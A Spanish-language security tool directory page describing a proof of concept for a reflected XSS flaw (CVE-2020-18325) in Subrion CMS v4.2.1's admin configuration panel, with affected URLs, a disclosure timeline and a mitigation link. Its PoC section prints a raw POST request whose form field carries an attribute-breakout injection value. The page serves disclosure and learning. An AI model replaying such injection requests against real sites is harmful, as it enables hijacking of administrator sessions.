Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-18325 — Prueba de concepto de explotación para vulnerabilidades XSS reflejado en el panel de configuración de Subrion CMS v4.2.1, que demuestra la inyección de JavaScript mediante peticiones POST. | Kitploit
Herramientas/GitHubGitHub/hamm0nz/cve-2020-18325
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAprendizaje y Educación
GitHubhamm0nz/cve-2020-18325

CVE-2020-18325

Prueba de concepto de explotación para vulnerabilidades XSS reflejado en el panel de configuración de Subrion CMS v4.2.1, que demuestra la inyección de JavaScript mediante peticiones POST.

Ver Repositorio
1hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Existe una vulnerabilidad de Cross Site Scripting (XSS) múltiple en Intelliants Subrion CMS v4.2.1 en el panel de Configuración.

Descripción

Subrion CMS es fácil de instalar y sencillo de administrar. Úselo como aplicación independiente o junto con otras aplicaciones para crear sitios de nivel inicial, medianos o grandes.

Se descubrieron múltiples vulnerabilidades de Cross-site Scripting reflejado en el panel de configuración de Subrion CMS v.4.2.1, lo que permite a un atacante remoto inyectar JavaScript arbitrario.

Fecha: 27-02-2022
Enlace del software: https://subrion.org
Autor del exploit: HaMM0nz
CVE: CVE-2020-18325
Categoría: Aplicación web
URL afectada

  • /panel/configuration/pictures/
  • /panel/configuration/mail/
  • /panel/configuration/miscellaneous/
  • /panel/menus/add/

Prueba de concepto

POST /panel/configuration/pictures/ HTTP/1.1
Host: 172.16.63.129
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.63.129/panel/configuration/pictures/ Content-Type: multipart/form-data; boundary=---------------------------17647740521660843247800008623 Content-Length: 5605 Connection: close Cookie: INTELLI_7da515443a=2hen33trbsgsadue2rgcti4sr1; loader=loaded Upgrade-Insecure-Requests: 1






-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="__st"

t9eQz0wrvfrlVO1rNDO9ZbPOB3mDmkNw8k17yS6f
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[image_quality]"

1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[image_quality]"

75
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[allow_animated_gifs]"
1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"
0
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"
test">1qazx

Cronología

Descubrimiento e informe : 24 de junio de 2019
Se asignó el ID de CVE : 11 de agosto de 2021
Divulgación pública : 27 de febrero de 2022

Solución

Considere cumplir con las pautas de prevención de XSS de OWASP. (https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)

Descargar herramienta